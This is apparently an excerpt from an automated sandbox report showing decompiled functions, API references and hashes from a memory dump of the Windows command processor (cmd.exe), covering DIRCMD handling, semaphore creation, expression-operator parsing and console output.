0x001b92fd
0x001b9300
0x001b9303
0x001b930a
0x001d08ff
0x001d08ff
0x001d0902
0x00000000
0x001b9310
0x001b9315
0x001b91e2
0x001b91e2
0x001b91e4
0x001b91e7
0x00000000
0x001b91e7
0x001b930a
0x001b927d
0x001b9280
0x001b9293
0x001b9295
0x001b929a
0x001b938d
0x001b9390
0x001b9393
0x001b9393
0x001b9396
0x001b9399
0x001b93a2
0x001b93a4
0x001b93a9
0x001b93af
0x001b93af
0x001b93a9
0x001b92a0
0x001b92a3
0x001b92a6
0x001b92a8
0x001b92a8
0x001b92b0
0x001b92b0
0x001b92b3
0x001b92b6
0x001b92c1
0x001b934d
0x001b934f
0x001b934f
0x001b9352
0x001b9352
0x001b9355
0x001b9358
0x00000000
0x001b9352
0x00000000
0x001b92c1
0x001b9251
0x001b9253
0x001b9253
0x001b9256
0x001b9256
0x001b9259
0x001b925c
0x001b9267
0x001b93d4
0x001b93d6
0x001b93d6
0x001b93e0
0x001b93e0
0x001b93e3
0x001b93e6
0x001b93ed
0x001b93ed
0x00000000
0x001b9267
0x001b9247
0x00000000
0x001b9247
0x001b9211
0x001b9213
0x001b9213
0x001b9216
0x001b9216
0x001b9219
0x001b921c
0x001b9225
0x001b9227
0x00000000
0x001b9227
0x001b9114
0x001d090a
0x001d090d
0x001d0910
0x001b911a
0x001b911a
0x001b911a
0x001b9121
0x001b9123
0x001b9126
0x001b9128
0x001b9128
0x001b912e
0x00000000
0x00000000
0x001b9135
0x001b9138
0x001b913b
0x001b913b
0x001b9143
0x001d091c
0x001d091c
0x00000000
0x001d091c
0x001b914b
0x001b914d
0x001b914f
0x001d0924
0x001d0929
0x00000000
0x00000000
0x001d0933
0x001d0938
0x001d093e
0x001d0944
0x001d0944
0x001d0948
0x001d0960
0x00000000
0x001d0960
0x001b9155
0x001b9158
0x001b915a
0x001b915d
0x001b915d
0x001b915f
0x001b9162
0x001b9168
0x00000000
0x00000000
0x001b9170
0x001b9170
0x001b9179
0x001b917c
0x00000000
0x00000000
0x001b9182
0x001b9185
0x001b918c
0x001b9194
0x001b919a
0x00000000
0x00000000
0x001b91a2
0x001b91a7
0x001b91ac
0x001b91af
0x001b91b2
0x001b91b2
0x001b91b7
0x001b91bd
0x001b91c2
0x00000000
0x00000000
0x001b9322
0x001b9325
0x001b9326
0x001b932d
0x00000000
0x00000000
0x001b9334
0x001b9339
0x001b933f
0x001b9342
0x001b9345
0x001b9345
0x001b91c8
0x001b91cb
0x001b91ce
0x001b91d1
0x001b91d4
0x001b91d7
0x001b91dd
0x00000000
0x00000000
0x001b91df
0x00000000
0x001b91df
0x001b90fc
0x001b90bf
0x001b90c9
0x001b90cb
0x001b90cd
0x001b90d0
0x00000000
0x001b90d0
0x001b8fd3
0x001b8fd5
0x001b8fd8
0x001b8fda
0x001b8fe0
0x001b8fe0
0x001b8fe6
0x00000000
0x00000000
0x001b8fe8
0x001b8fef
0x00000000
0x001b8ffa
0x001b8ffa
0x001b8ffa
0x001b8ffd
0x001b9000
0x00000000
0x001b9000
0x001b8fef
0x001b900e
0x00000000
0x00000000
0x001b9014
0x001b9019
0x00000000
0x00000000
0x001b9023
0x001b902c
0x001b902e
0x001b9033
0x00000000
0x00000000
0x001b9039
0x001b9039
0x001b903e
0x00000000
0x00000000
0x001b9046
0x001d08dd
0x00000000
0x00000000
0x001d08e3
0x001d08e5
0x00000000
0x001d08e5
0x001b9051
0x00000000
0x00000000
0x001b9057
0x001b9059
0x001b905b
0x001b905d
0x001b905d
0x001b9060
0x001b9063
0x001b9066
0x001b9069
0x001b906e
0x00000000
0x00000000
0x001b9076
0x001b908e
0x001b9090
0x00000000
0x00000000
0x00000000
0x001b9090
0x001b9078
0x001b907e
0x00000000
0x00000000
0x001b9080
0x001b9083
0x001b9086
0x001b9089
0x001b908a
0x001b908b
0x001b908b
0x00000000

APIs

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

_wcsnicmp.MSVCRT ref: 001B91B7
wcstol.MSVCRT ref: 001B91FC
wcstol.MSVCRT ref: 001B928A
longjmp.MSVCRT(?,000000FF,EA614D48,-00000002,?,00000000), ref: 001D08B2
longjmp.MSVCRT(?,000000FF), ref: 001D08C6

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
String ID:
API String ID: 2863075230-0
Opcode ID: bcb9fa13cb90551add9b640e2e197c359d2594b1f6c8b849c3a0da2ce676820a
Instruction ID: 83a5019ef30beae3b6e658d9b932b5a8c0d01cc42db876f0f8d47f6c33436570
Opcode Fuzzy Hash: bcb9fa13cb90551add9b640e2e197c359d2594b1f6c8b849c3a0da2ce676820a
Instruction Fuzzy Hash: 01F1E375D00216CBCB28DFA8C8906FEB7B5BF98710F29425EE916A7390E7715D42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C4F66 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001C4F66(intOrPtr __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				WCHAR* _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				char _v1076;
				void _v1084;
				void* _v1096;
				int _v1100;
				WCHAR* _v1104;
				WCHAR* _v1108;
				char _v1112;
				WCHAR* _v1116;
				int _v1120;
				void* _v1124;
				intOrPtr _v1128;
				void* _v1138;
				int _v1142;
				int _v1146;
				int _v1150;
				int _v1154;
				int _v1158;
				int _v1162;
				int _v1166;
				int _v1170;
				short _v1172;
				int _v1176;
				WCHAR* _v1180;
				int _v1184;
				char _v1188;
				int _v1192;
				int _v1196;
				intOrPtr _v1200;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t78;
				WCHAR* _t97;
				signed int _t101;
				char _t112;
				void* _t113;
				void* _t135;
				void* _t139;
				intOrPtr _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;

				_t130 = __edx;
				_t143 = (_t141 & 0xfffffff8) - 0x4ac;
				_t78 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t78 ^ _t143;
				_v1200 = __ecx;
				_v1180 = 0;
				_v1172 = 0;
				_v1196 = 0;
				_v1192 = 0;
				_v1188 = 0;
				_t112 = 1;
				_v1184 = 0;
				_v1176 = 0;
				_v1170 = 0;
				_v1166 = 0;
				_v1162 = 0;
				_v1158 = 0;
				_v1154 = 0;
				_v1150 = 0;
				_v1146 = 0;
				_v1142 = 0;
				asm("stosd");
				_v564 = 0;
				asm("stosd");
				_v560 = 1;
				_v556 = 0x104;
				asm("stosd");
				asm("stosw");
				_v1124 = 0;
				_v1120 = 0;
				_v1116 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v1104 = 0;
				_v1100 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				memset( &_v1084, 0, 0x104);
				_t144 = _t143 + 0xc;
				if(E001C0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L14:
					__imp__??_V@YAXPAX@Z(_v564);
					_pop(_t135);
					_pop(_t139);
					_pop(_t113);
					return E001C6FD0(_t112, _t113, _v8 ^ _t144, _t130, _t135, _t139);
				}
				_t140 =  *0x1f3cd8;
				_v1192 = 6;
				_v20 = 0x104;
				_v1188 = 0;
				_v1196 = 0x8000;
				_v1124 = 0;
				_v1104 = 0;
				_v28 = 0;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_t144 = _t144 + 0xc;
				if(E001C0C70( &_v548, GetEnvironmentVariableW(L"DIRCMD", 0, 0)) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					goto L14;
				}
				_t97 = _v28;
				if(_t97 == 0) {
					_t97 =  &_v548;
				}
				if(GetEnvironmentVariableW(L"DIRCMD", _t97, _v20) != 0) {
					_t122 = _v28;
					if(_v28 == 0) {
						_t122 =  &_v548;
					}
					if(E001BCB48( &_v1196) == _t112) {
						_push(0);
						_push(0x2377);
						E001BC5A2(_t122);
					}
				}
				_t130 =  &_v1196;
				if(E001BCB48( &_v1196) != _t112) {
					_t101 = _v1196;
					if((_t101 & 0x00000040) != 0) {
						_t101 = _t101 & 0xfffb79fb;
						_v1196 = _t101;
					}
					if((_t101 & 0x00000400) != 0) {
						_v1196 = _t101 & 0xfffffdbb;
					}
					_t124 = _v564;
					if(_v564 == 0) {
						_t124 =  &_v1084;
					}
					_t130 = _v556;
					E001C36CB(_t112, _t124, _v556, 0);
					if(_v1128 == 0) {
						_t125 = _v564;
						_v1124 = _t112;
						if(_v564 == 0) {
							_t125 =  &_v1084;
						}
						_v1120 = E001C297B(_t125);
						_v1112 = _t112;
						_v1116 = 0;
						_v1108 = 0;
					}
					_t112 = E001C2DD2( &_v1188, _t130);
					_t106 = _v556;
					if(_v556 == 0) {
						_t106 =  &_v1076;
					}
					E001C0BFC(_t106, _v548);
					E001C2A06(_t140, 0);
				}
				goto L13;
			}

0x001c4f66
0x001c4f6e
0x001c4f74
0x001c4f7b
0x001c4f85
0x001c4f8b
0x001c4f8f
0x001c4f98
0x001c4fa0
0x001c4fa9
0x001c4fad
0x001c4fae
0x001c4fb2
0x001c4fb6
0x001c4fba
0x001c4fbe
0x001c4fc2
0x001c4fc6
0x001c4fca
0x001c4fce
0x001c4fd2
0x001c4fd6
0x001c4fd9
0x001c4fe0
0x001c4fe1
0x001c4fe8
0x001c4fef
0x001c4ff0
0x001c4ff4
0x001c4ffc
0x001c5000
0x001c5004
0x001c5008
0x001c500c
0x001c5010
0x001c5014
0x001c5015
0x001c5016
0x001c501f
0x001c502d
0x001c504a
0x001c5176
0x001c517d
0x001c518d
0x001c518e
0x001c518f
0x001c519a
0x001c519a
0x001c5050
0x001c505d
0x001c5066
0x001c5076
0x001c507a
0x001c5082
0x001c5086
0x001c508a
0x001c5091
0x001c5098
0x001c509d
0x001c50bc
0x001c5168
0x001c516f
0x00000000
0x001c5175
0x001c50c2
0x001c50cb
0x001c50cd
0x001c50cd
0x001c50e9
0x001cf084
0x001cf08d
0x001cf08f
0x001cf08f
0x001cf0a1
0x001cf0a7
0x001cf0a8
0x001cf0ad
0x001cf0b3
0x001cf0a1
0x001c50f3
0x001c50fe
0x001c5100
0x001c5106
0x001c5108
0x001c510d
0x001c510d
0x001c5116
0x001cf0be
0x001cf0be
0x001c511c
0x001c5125
0x001c519b
0x001c519b
0x001c5127
0x001c512f
0x001c5138
0x001cf0c7
0x001cf0ce
0x001cf0d4
0x001cf0d6
0x001cf0d6
0x001cf0e2
0x001cf0e6
0x001cf0ea
0x001cf0ee
0x001cf0ee
0x001c5147
0x001c5149
0x001c5152
0x001c51a4
0x001c51a4
0x001c515c
0x001c5163
0x001c5163
0x00000000

APIs

memset.MSVCRT ref: 001C501F

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

memset.MSVCRT ref: 001C5098
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,?,?,-00000001,?,00000002,00000000), ref: 001C50A7
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000,?,?,-00000001,?,00000002,00000000), ref: 001C50E1
??_V@YAXPAX@Z.MSVCRT ref: 001C516F
??_V@YAXPAX@Z.MSVCRT ref: 001C517D

Strings

DIRCMD, xrefs: 001C50A2, 001C50DC

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$EnvironmentVariable
String ID: DIRCMD
API String ID: 1405722092-1465291664
Opcode ID: 855e13d7fc78587640c9bc7ea9897d4edbca6c1db90083ac1d1f4f4067cba574
Instruction ID: 8f153bf8676de19d223bfcffdb47f97bb423d8125acdb1f36a3ef1952ac05aed
Opcode Fuzzy Hash: 855e13d7fc78587640c9bc7ea9897d4edbca6c1db90083ac1d1f4f4067cba574
Instruction Fuzzy Hash: 427145B160C7819BD328DF29D885B9BBBE5BBA4304F14492EF19982260DB30D948CB57

Uniqueness

Uniqueness Score: -1.00%

Function 001D196F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E001D196F(void** __ecx, intOrPtr _a4, signed int _a12, signed int _a16) {
				void* _v0;
				signed int _v8;
				char _v532;
				void** _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				short* _t26;
				void* _t29;
				void* _t31;
				signed int* _t38;
				void** _t40;
				long _t41;
				signed int _t42;
				signed int _t47;
				char* _t48;
				void* _t55;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				void* _t63;
				void* _t64;
				signed int _t65;

				_t20 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t20 ^ _t65;
				_t59 = _a12;
				_t40 = __ecx;
				_v536 = __ecx;
				_t24 = _t59 & 0x80000000 | _a16;
				if((_t59 & 0x80000000 | _a16) != 0) {
					E001C80F2(_t24);
				}
				E001C1040( &_v532, 0x104, _a4);
				_t57 = 0x104;
				_t26 =  &_v532;
				while( *_t26 != 0) {
					_t26 = _t26 + 2;
					_t57 = _t57 - 1;
					if(_t57 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t47 =  ~_t57 & 0x00000104 - _t57;
				if(_t57 != 0) {
					_t38 =  &_v532 + _t47 * 2;
					_t64 = 0x104 - _t47;
					if(_t64 == 0) {
						L14:
						_t38 = _t38 - 2;
					} else {
						_t55 = 0x7ffffffe;
						_t57 = L"_p0" - _t38;
						while(_t55 != 0) {
							_t42 =  *(_t38 + _t57) & 0x0000ffff;
							if(_t42 == 0) {
								break;
							} else {
								 *_t38 = _t42;
								_t55 = _t55 - 1;
								_t38 =  &(_t38[0]);
								_t64 = _t64 - 1;
								if(_t64 != 0) {
									continue;
								} else {
									L13:
									_t40 = _v536;
									goto L14;
								}
							}
							goto L16;
						}
						if(_t64 != 0) {
							_t40 = _v536;
						} else {
							goto L13;
						}
					}
					L16:
					 *_t38 = 0;
				}
				_t60 = _t59 & 0x7fffffff;
				_t29 = _t60;
				if(_t60 <= 0) {
					_t29 = 1;
				}
				_t48 =  &_v532;
				__imp__CreateSemaphoreExW(0, _t60, _t29, _t48, 0, 0x1f0003);
				_t61 = _t29;
				if(_t61 == 0) {
					_t57 = 0x1621;
					_t63 = E001D2913("internal\\sdk\\inc\\wil\\ResultMacros.h");
					if(_t63 >= 0) {
						goto L25;
					} else {
						_t57 = 0x84;
						E001D292C("wil", _t63);
						_t31 = _t63;
					}
				} else {
					_t63 =  *_t40;
					if(_t63 != 0) {
						_t41 = GetLastError();
						if(CloseHandle(_t63) == 0) {
							_push(_t48);
							_t57 = 0x879;
							E001D2D56();
						}
						SetLastError(_t41);
						_t40 = _v536;
					}
					 *_t40 = _t61;
					L25:
					_t31 = 0;
				}
				return E001C6FD0(_t31, _t40, _v8 ^ _t65, _t57, _t61, _t63);
			}

0x001d197a
0x001d1981
0x001d1987
0x001d198a
0x001d198e
0x001d1999
0x001d199c
0x001d199e
0x001d199e
0x001d19b3
0x001d19b8
0x001d19ba
0x001d19c0
0x001d19c6
0x001d19c9
0x001d19cc
0x00000000
0x00000000
0x00000000
0x001d19cc
0x001d19d6
0x001d19d8
0x001d19dc
0x001d19e4
0x001d19e7
0x001d19e9
0x001d1a1c
0x001d1a1c
0x001d19eb
0x001d19f0
0x001d19f5
0x001d19f7
0x001d19fb
0x001d1a02
0x00000000
0x001d1a04
0x001d1a04
0x001d1a07
0x001d1a08
0x001d1a0b
0x001d1a0e
0x00000000
0x001d1a10
0x001d1a16
0x001d1a16
0x00000000
0x001d1a16
0x001d1a0e
0x00000000
0x001d1a02
0x001d1a14
0x001d1a21
0x00000000
0x00000000
0x00000000
0x001d1a14
0x001d1a27
0x001d1a29
0x001d1a29
0x001d1a2c
0x001d1a32
0x001d1a34
0x001d1a36
0x001d1a36
0x001d1a42
0x001d1a4d
0x001d1a53
0x001d1a57
0x001d1aa7
0x001d1ab6
0x001d1aba
0x00000000
0x001d1abc
0x001d1abf
0x001d1aca
0x001d1acf
0x001d1acf
0x001d1a59
0x001d1a59
0x001d1a5d
0x001d1a66
0x001d1a70
0x001d1a72
0x001d1a76
0x001d1a7b
0x001d1a7b
0x001d1a81
0x001d1a87
0x001d1a87
0x001d1a8d
0x001d1a8f
0x001d1a8f
0x001d1a8f
0x001d1aa1

APIs

CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?,00000000,001F0003,00000000,?,?,00000000), ref: 001D1A4D
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001D1A5F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000104), ref: 001D1A68
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001D1A81

Strings

internal\sdk\inc\wil\ResultMacros.h, xrefs: 001D1AAC
_p0, xrefs: 001D19EB
wil, xrefs: 001D1AC5

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleSemaphore
String ID: _p0$internal\sdk\inc\wil\ResultMacros.h$wil
API String ID: 2276426104-46676964
Opcode ID: f03a9dfa60c71a57132f80644fb70187325d018b9a98804eb6080e5d60ac7ed4
Instruction ID: 34fb13a53acacaacc5966b24d97a236052495b39bc2115b246bc3c80dafd7d26
Opcode Fuzzy Hash: f03a9dfa60c71a57132f80644fb70187325d018b9a98804eb6080e5d60ac7ed4
Instruction Fuzzy Hash: BC412631B41129BBCB24AF68CD95BAA33A6EFA5310F15425AF805D7380DB70DD40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 001B6785 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001B6785(signed short** __ecx, signed short** __edx, void* __eflags, signed short** _a4) {
				signed short* _t8;
				signed short _t9;
				long _t13;
				signed short** _t18;
				signed short _t25;
				long _t32;
				wchar_t* _t33;
				signed short** _t34;

				_t18 = __edx;
				_t34 = __ecx;
				E001B9794(__ecx);
				_t32 =  *( *_t34) & 0x0000ffff;
				if(_t32 == 0 || iswdigit(_t32) != 0 || wcschr(L"<>+-*/%()|^&=,", _t32) != 0) {
					L12:
					return 0;
				} else {
					_t33 = L"+-~!";
					if(wcschr(_t33, _t32) != 0) {
						goto L12;
					}
					_t8 =  *_t34;
					 *_t18 = _t8;
					while(1) {
						_t9 =  *_t8 & 0x0000ffff;
						_t25 = _t9;
						if(_t9 == 0) {
							break;
						}
						_t13 = _t25 & 0x0000ffff;
						if(_t13 <= 0x20 || wcschr(_t33, _t13) != 0 || wcschr(L"<>+-*/%()|^&=,",  *( *_t34) & 0x0000ffff) != 0) {
							break;
						} else {
							 *_t34 =  &(( *_t34)[1]);
							_t8 =  *_t34;
							continue;
						}
					}
					 *_a4 =  *_t34;
					return 1;
				}
			}

0x001b678d
0x001b678f
0x001b6791
0x001b6798
0x001b679e
0x001b6828
0x00000000
0x001b67c2
0x001b67c3
0x001b67d3
0x00000000
0x00000000
0x001b67d5
0x001b67d7
0x001b67d9
0x001b67d9
0x001b67dc
0x001b67e1
0x00000000
0x00000000
0x001b67e3
0x001b67e9
0x00000000
0x001b6810
0x001b6810
0x001b6813
0x00000000
0x001b6813
0x001b67e9
0x001b681c
0x00000000
0x001b6820

APIs

iswdigit.MSVCRT ref: 001B67A5
wcschr.MSVCRT ref: 001B67B6
wcschr.MSVCRT ref: 001B67C9
wcschr.MSVCRT ref: 001B67ED
wcschr.MSVCRT ref: 001B6804

Strings

+-~!, xrefs: 001B67C3, 001B67C8, 001B67EC
<>+-*/%()|^&=,, xrefs: 001B67B1, 001B67FF

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: wcschr$iswdigit
String ID: +-~!$<>+-*/%()|^&=,
API String ID: 2770779731-632268628
Opcode ID: bacf94d61e34219a579555f7624965219d604c3f01766d991e48358c62d22eb8
Instruction ID: ca382d8db716d5c2541ab08c2bb85a86ffee871643b89362138d3fb8cb05d1b3
Opcode Fuzzy Hash: bacf94d61e34219a579555f7624965219d604c3f01766d991e48358c62d22eb8
Instruction Fuzzy Hash: B611A376604302EF9B249F2AE8449F677E8EFBA771321042EF581C7590FB25DC00D660

Uniqueness

Uniqueness Score: -1.00%

Function 001BB610 Relevance: 12.2, APIs: 8, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E001BB610(void* __ebx, void** __ecx, void* __edi) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				void* _t37;
				intOrPtr _t39;
				void* _t40;
				void* _t52;
				long _t55;
				long _t56;
				void* _t57;
				long _t61;
				void* _t66;
				long _t73;
				void* _t85;
				void* _t87;
				void** _t101;
				long _t104;

				_t101 = __ecx;
				_t37 = E001C269C(E001BB6B9(__ecx));
				_t104 = _t101[4];
				if(_t37 != 0) {
					_t39 = _t104 + _t101[2] * 2;
					_v12 = _t39;
					__eflags = _t104 - _t39;
					if(_t104 < _t39) {
						_t85 = 0x2022;
						while(1) {
							_t73 = _t104;
							__eflags = _t104 - _t39;
							if(_t104 >= _t39) {
								goto L3;
							} else {
								goto L12;
							}
							while(1) {
								L12:
								__eflags =  *_t73 - _t85;
								if( *_t73 == _t85) {
									break;
								}
								_t73 = 2 + _t73;
								__eflags = _t73 - _t39;
								if(_t73 < _t39) {
									continue;
								}
								break;
							}
							__eflags = _t73 - _t104;
							if(_t73 == _t104) {
								goto L20;
							} else {
								_t66 = _t73 - _t104 >> 1;
								_v16 = _t66;
								__imp___get_osfhandle(0);
								_t54 = WriteConsoleW(_t66, 1, _t104, _t66,  &_v8);
								__eflags = _t54;
								if(_t54 == 0) {
									goto L30;
								} else {
									_t54 = _v16;
									__eflags = _v8 - _v16;
									if(_v8 != _v16) {
										goto L30;
									} else {
										_t39 = _v12;
										_t104 = _t73;
										_t85 = 0x2022;
										while(1) {
											L20:
											__eflags = _t73 - _t39;
											if(_t73 >= _t39) {
												break;
											}
											__eflags =  *_t73 - _t85;
											if( *_t73 == _t85) {
												_t73 = 2 + _t73;
												__eflags = _t73;
												continue;
											}
											break;
										}
										__eflags = _t73 - _t104;
										if(_t73 == _t104) {
											L27:
											_t85 = 0x2022;
											__eflags = _t104 - _t39;
											if(_t104 < _t39) {
												continue;
											} else {
												goto L3;
											}
										} else {
											__eflags =  *_t101;
											if( *_t101 != 0) {
												SetConsoleMode( *_t101, 2);
											}
											_t52 = _t73 - _t104 >> 1;
											_v16 = _t52;
											__imp___get_osfhandle(_t104, _t52,  &_v8, 0);
											_t87 = 1;
											_t104 = WriteConsoleW(_t52, ??, ??, ??, ??);
											_t54 = E001C06C0(_t87);
											__eflags = _t104;
											if(_t104 == 0) {
												goto L30;
											} else {
												_t54 = _v16;
												__eflags = _v8 - _v16;
												if(_v8 != _v16) {
													goto L30;
												} else {
													_t39 = _v12;
													_t104 = _t73;
													goto L27;
												}
											}
										}
									}
								}
							}
							goto L38;
						}
					}
					goto L3;
				} else {
					if(E001C27C8(_t101[2] + _t101[2], _t104, _t101[2] + _t101[2],  &_v8) == 0) {
						L30:
						_t89 = 1;
						_t55 = E001C0178(_t54);
						__eflags = _t55;
						if(_t55 == 0) {
							_t89 = 1;
							_t56 = E001D9953(_t55, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								_push(_t56);
								_push(0x70);
								goto L34;
							}
						} else {
							_push(0);
							_push(0x1d);
							L34:
							E001BC5A2(_t89);
							_pop(_t89);
						}
						_t57 = E001D9287(_t89);
						__imp__longjmp(0x1eb8b8, 1);
						asm("int3");
						__eflags =  *(_t104 + 4) - _t57;
						if(__eflags < 0) {
							return _t57;
						} else {
							E001D3BB0(__eflags, 0);
							 *(_t104 + 4) =  *(_t104 + 4) & 0x00000000;
							E001C4F29(_t104);
							_t61 =  *((intOrPtr*)(_t104 + 0x1c)) - 1;
							__eflags = _t61;
							 *(_t104 + 0x24) = _t61;
							return _t61;
						}
					} else {
						_t70 = _t101[2];
						_t54 = _t101[2] + _t70;
						if(_v8 != _t101[2] + _t70) {
							goto L30;
						} else {
							L3:
							_t40 = E001C269C(_t39);
							if(_t40 != 0) {
								__imp___get_osfhandle(0);
								WriteConsoleW( &_v8, 1, L"\r\n", 2,  &_v8);
							} else {
								E001C27C8( &_v8, L"\r\n", 4,  &_v8);
							}
							_t101[1] = _t101[1] + E001BBED7(_t101, _t101[4]) + 1;
							E001BB6B9(_t101);
							if(_t101[1] > _t101[7]) {
								_t101[1] = _t101[1] & 0x00000000;
							}
							 *(_t101[4]) = 0;
							_t101[2] = _t101[2] & 0;
							return 0;
						}
					}
				}
				L38:
			}

0x001bb61b
0x001bb625
0x001bb62a
0x001bb62f
0x001c983d
0x001c9840
0x001c9843
0x001c9845
0x001c984b
0x001c9850
0x001c9850
0x001c9852
0x001c9854
0x00000000
0x00000000
0x00000000
0x00000000
0x001c985a
0x001c985a
0x001c985a
0x001c985d
0x00000000
0x00000000
0x001c985f
0x001c9862
0x001c9864
0x00000000
0x00000000
0x00000000
0x001c9864
0x001c9866
0x001c9868
0x00000000
0x001c986a
0x001c9874
0x001c987a
0x001c987d
0x001c9885
0x001c988b
0x001c988d
0x00000000
0x001c9893
0x001c9893
0x001c9896
0x001c9899
0x00000000
0x001c989f
0x001c989f
0x001c98a2
0x001c98a4
0x001c98b3
0x001c98b3
0x001c98b3
0x001c98b5
0x00000000
0x00000000
0x001c98ab
0x001c98ae
0x001c98b0
0x001c98b0
0x00000000
0x001c98b0
0x00000000
0x001c98ae
0x001c98b7
0x001c98b9
0x001c9903
0x001c9903
0x001c9908
0x001c990a
0x00000000
0x001c9910
0x00000000
0x001c9910
0x001c98bb
0x001c98bb
0x001c98be
0x001c98c4
0x001c98c4
0x001c98d4
0x001c98da
0x001c98dd
0x001c98e3
0x001c98eb
0x001c98ed
0x001c98f2
0x001c98f4
0x00000000
0x001c98f6
0x001c98f6
0x001c98f9
0x001c98fc
0x00000000
0x001c98fe
0x001c98fe
0x001c9901
0x00000000
0x001c9901
0x001c98fc
0x001c98f4
0x001c98b9
0x001c9899
0x001c988d
0x00000000
0x001c9868
0x001c9850
0x00000000
0x001bb635
0x001bb64b
0x001c9934
0x001c9936
0x001c9937
0x001c993c
0x001c993e
0x001c9948
0x001c9949
0x001c994e
0x001c9950
0x001c9952
0x001c9953
0x00000000
0x001c9953
0x001c9940
0x001c9940
0x001c9942
0x001c9955
0x001c9955
0x001c995b
0x001c995b
0x001c995c
0x001c9968
0x001c996e
0x001c996f
0x001c9972
0x001bb6ca
0x001c9978
0x001c997a
0x001c997f
0x001c9985
0x001c998d
0x001c998d
0x001c998e
0x001c9992
0x001c9992
0x001bb651
0x001bb651
0x001bb654
0x001bb659
0x00000000
0x001bb65f
0x001bb65f
0x001bb662
0x001bb66c
0x001c9921
0x001c9929
0x001bb672
0x001bb67d
0x001bb67d
0x001bb68f
0x001bb692
0x001bb69d
0x001bb6b3
0x001bb6b3
0x001bb6a4
0x001bb6a7
0x001bb6b2
0x001bb6b2
0x001bb659
0x001bb64b
0x00000000

APIs

Part of subcall function 001C269C: _get_osfhandle.MSVCRT ref: 001C26A7
Part of subcall function 001C269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001BC5F8,?,?,?), ref: 001C26B6
Part of subcall function 001C269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001C26D2
